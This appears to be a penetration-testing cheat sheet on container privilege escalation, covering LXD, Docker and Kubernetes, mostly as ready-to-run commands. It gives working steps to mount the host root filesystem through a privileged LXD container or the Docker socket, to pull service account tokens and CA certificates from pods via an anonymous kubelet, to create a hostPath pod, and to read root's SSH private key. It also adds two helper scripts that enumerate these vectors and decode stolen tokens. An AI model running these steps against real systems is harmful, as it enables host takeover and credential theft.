Containers

LXD Privilege Escalation

LXD is the Linux container daemon built on top of LXC; its system containers share the host kernel. The daemon itself runs as root, and any member of the lxd group may talk to its socket, so such a user can create a privileged container with the host's root filesystem attached as a disk device and then read and write the host as root from inside the container.

# Confirm membership of the lxd group
id

# Import an existing container image (any image tarball works; the alias is arbitrary)
lxc image import ubuntu-image.tar.xz --alias privesc

# Initialize a privileged container and attach the host filesystem as a disk device
lxc init privesc privesc-container -c security.privileged=true
lxc config device add privesc-container host-root disk source=/ path=/mnt/root recursive=true

# Start the container and get a shell in it; the host root is at /mnt/root
lxc start privesc-container
lxc exec privesc-container -- /bin/bash   ## Summon 'bash' (use /bin/sh if the image lacks bash) and go to '/mnt/root': the host's filesystem, writable as root

Docker Privilege Escalation

Docker is a popular containerization tool that runs applications in isolated environments. Its daemon runs as root, so misconfigurations (membership of the docker group, a writable daemon socket, privileged or host-mounted containers) can lead to privilege escalation, letting an attacker escape the container and gain root access to the host machine.

# Check whether we are in the docker group
groups
grep 'docker' /etc/group

# List containers (including stopped ones) and images
docker ps -a
docker images

# Look for mounted volumes: host paths bind-mounted into a container are reachable from inside it
docker inspect --format '{{json .Mounts}}' <container_id>
df -h
ls /mnt

# Check for access to the Docker socket
## If we can write to it, the root daemon will create containers with whatever privileges we ask for
ls -l /var/run/docker.sock

# Identify writable Docker config files (e.g. daemon.json, read by the root daemon on restart)
find /etc/docker -type f -writable

# If we have write access to /var/run/docker.sock (e.g. as a member of the docker group),
# start a container with the host root filesystem mounted and chroot into it for a root shell on the host
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
## Same thing with the socket given explicitly, useful when the socket lives somewhere else
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt sh

# Running a privileged container (all capabilities and host devices; host disks can be mounted from inside)
docker run --rm -it --privileged ubuntu bash

# If a user's home directory is bind-mounted into a container we have a shell in (here under /hostsystem), extract SSH keys
cd /hostsystem/home/<user>/.ssh
cat id_rsa
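The enumeration steps of the LXD and Docker sections, collected into one POSIX shell script as an added example (not part of the original page): it checks lxd and docker group membership, whether the Docker socket is writable, and whether files under the Docker config directory are writable. The group file, socket and config paths are parameters so the same functions run against the live /etc/group, /var/run/docker.sock and /etc/docker or against the constructed sample group file embedded below; the alice/bob entries and the function names are assumptions for the demonstration, not from the page.

```shell
#!/bin/sh
# Enumerate the escalation vectors from the LXD and Docker sections:
# lxd/docker group membership, a writable Docker socket and writable daemon
# config files. Example code added here, not part of the original page. The
# paths are parameters so the checks run against constructed sample input as
# well as against the live /etc/group, /var/run/docker.sock and /etc/docker.

# Is user $1 listed as a supplementary member of group $2 in group file $3?
# (/etc/group lines are name:password:gid:member1,member2,...)
in_group() {
    awk -F: -v u="$1" -v g="$2" '
        $1 == g { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] == u) found = 1 }
        END { if (found) exit 0; exit 1 }' "$3"
}

# A Docker socket we can write to means we can ask the root daemon to run anything.
docker_socket_writable() {
    [ -S "$1" ] && [ -w "$1" ]
}

# Print one line per finding. $1 user, $2 group file, $3 docker socket, $4 docker config dir.
container_privesc_checks() {
    user=$1; group_file=$2; sock=$3; cfg=$4
    in_group "$user" lxd "$group_file" &&
        echo "lxd group: a privileged LXD container with / as a disk device gives root on the host"
    in_group "$user" docker "$group_file" &&
        echo "docker group: docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh gives root on the host"
    docker_socket_writable "$sock" &&
        echo "docker socket writable: docker -H unix://$sock run -v /:/mnt --rm -it ubuntu chroot /mnt sh"
    if [ -d "$cfg" ]; then
        find "$cfg" -type f -writable 2>/dev/null | sed 's/^/writable docker config (read by the root daemon on restart): /'
    fi
    return 0
}

# Constructed sample input so the script runs without lxd or docker installed.
SAMPLE_DIR=$(mktemp -d)
printf '%s\n' 'root:x:0:' 'docker:x:999:alice,bob' 'lxd:x:998:alice' > "$SAMPLE_DIR/group"
mkdir "$SAMPLE_DIR/docker" && printf '{}\n' > "$SAMPLE_DIR/docker/daemon.json"
container_privesc_checks alice "$SAMPLE_DIR/group" "$SAMPLE_DIR/docker.sock" "$SAMPLE_DIR/docker"
# On a real host: container_privesc_checks "$(id -un)" /etc/group /var/run/docker.sock /etc/docker
rm -rf "$SAMPLE_DIR"
```

The group check only reads the supplementary member list, which is where lxd and docker membership lives; a primary group set in /etc/passwd is not considered. The socket test requires a real Unix socket, so a plain file at that path is reported as not exploitable.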

Kubernetes Privilege Escalation

Kubernetes (K8s) is a container orchestration platform used for managing containerized applications. Understanding its components (control plane, worker nodes, the kubelet on each node) and its security controls (RBAC, authentication and authorization at the API server, the kubelet API) is critical for penetration testing.

# Probe the API server (port 6443) for anonymous access
curl https://<K8s_API_SERVER>:6443 -k

# Port 10250 is the kubelet API of a node (every node, control plane included, runs one),
# not the API server itself. If it allows anonymous access, list the pods running on that node.
curl https://<K8s_API_SERVER>:10250/pods -k | jq .

# List pods with kubeletctl (-i skips TLS verification), useful for direct interaction with containers
kubeletctl -i --server <K8s_API_SERVER> pods

# Check which pods allow command execution through the kubelet (Remote Code Execution, RCE)
kubeletctl -i --server <K8s_API_SERVER> scan rce

# Extract a pod's service account token for authentication against the API server
kubeletctl -i --server <K8s_API_SERVER> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p <POD_NAME> -c <CONTAINER_NAME> | tee -a k8.token

# Extract the cluster CA certificate so kubectl can verify the API server
kubeletctl -i --server <K8s_API_SERVER> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <POD_NAME> -c <CONTAINER_NAME> | tee -a ca.crt

# Check permissions granted to the service account using the extracted token (look for create on pods)
kubectl --token=<TOKEN> --certificate-authority=ca.crt --server=https://<K8s_API_SERVER>:6443 auth can-i --list
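Before spending the token it helps to know whose it is. The following POSIX shell snippet is an added example, not from the original page: it decodes the payload of the service account JWT read above (base64url, no signature check) and reads the sub claim, which both legacy secret-backed tokens and newer bound tokens set to system:serviceaccount:<namespace>:<name>. The token embedded in it is constructed for the demonstration with a dummy signature; the function names and the kube-system/default identity are assumptions, not from the page.

```shell
#!/bin/sh
# Inspect a service-account token before using it: decode the JWT payload
# (no signature check; the token came from the kubelet and is used as-is) and
# read the subject, which names the namespace and service account it acts as.
# Example code added here, not part of the original page; the token below is
# constructed for the demonstration, not one taken from a cluster.

# base64url -> base64: swap the alphabet, restore padding, decode.
b64url_decode() {
    s=$(printf '%s' "$1" | tr '_-' '/+')
    case $(( ${#s} % 4 )) in
        2) s="${s}==" ;;
        3) s="${s}=" ;;
    esac
    printf '%s' "$s" | base64 -d
}

# The JSON payload is the second dot-separated segment of the JWT.
jwt_payload() {
    b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"
}

# Value of a string claim; works for the flat keys of legacy tokens
# ("kubernetes.io/serviceaccount/namespace") as well as "iss"/"sub" in bound tokens.
jwt_claim() {
    jwt_payload "$1" | sed -n "s|.*\"$2\":\"\([^\"]*\)\".*|\1|p"
}

# Both legacy (secret-backed) and bound tokens carry
# sub = system:serviceaccount:<namespace>:<service-account>; print the two names.
sa_identity() {
    sub=$(jwt_claim "$1" sub)
    case "$sub" in
        system:serviceaccount:*)
            printf '%s %s\n' "$(printf '%s' "$sub" | cut -d: -f3)" "$(printf '%s' "$sub" | cut -d: -f4)" ;;
        *)
            echo "not a service-account token (sub=$sub)" >&2
            return 1 ;;
    esac
}

# Constructed sample token: a header and a bound-token payload, with a dummy signature.
b64url() { base64 | tr -d '\n=' | tr '/+' '_-'; }
SAMPLE_HEADER='{"alg":"RS256","kid":"sample"}'
SAMPLE_PAYLOAD='{"iss":"https://kubernetes.default.svc.cluster.local","sub":"system:serviceaccount:kube-system:default","aud":["https://kubernetes.default.svc.cluster.local"],"kubernetes.io":{"namespace":"kube-system","serviceaccount":{"name":"default"}}}'
SAMPLE_TOKEN="$(printf '%s' "$SAMPLE_HEADER" | b64url).$(printf '%s' "$SAMPLE_PAYLOAD" | b64url).c2lnbmF0dXJl"

sa_identity "$SAMPLE_TOKEN"
# On an engagement: sa_identity "$(cat k8.token)"
```

The sed-based claim lookup keeps the snippet to coreutils; where jq is available, `jwt_payload "$TOKEN" | jq .` shows the whole payload, including the pod binding and expiry of bound tokens. Claims in the header (alg, kid) are deliberately not consulted, since only the payload says who the token represents.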

# "escalate-access.yaml": a pod that mounts the node's root filesystem and uses the host network
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: escalate-access
  namespace: default
spec:
  containers:
  - name: escalate-container
    image: nginx:1.15.3
    volumeMounts:
    - mountPath: /host-root
      name: mount-root-volume
  volumes:
  - name: mount-root-volume
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
```

# Apply the YAML to create the pod (needs create on pods in the namespace); the node's root filesystem is then under /host-root
kubectl --token=<TOKEN> --certificate-authority=ca.crt --server=https://<K8s_API_SERVER>:6443 apply -f escalate-access.yaml

# Read the node's root SSH private key through the kubelet for further access
kubeletctl -i --server <K8s_API_SERVER> exec "cat /host-root/root/.ssh/id_rsa" -p escalate-access -c escalate-container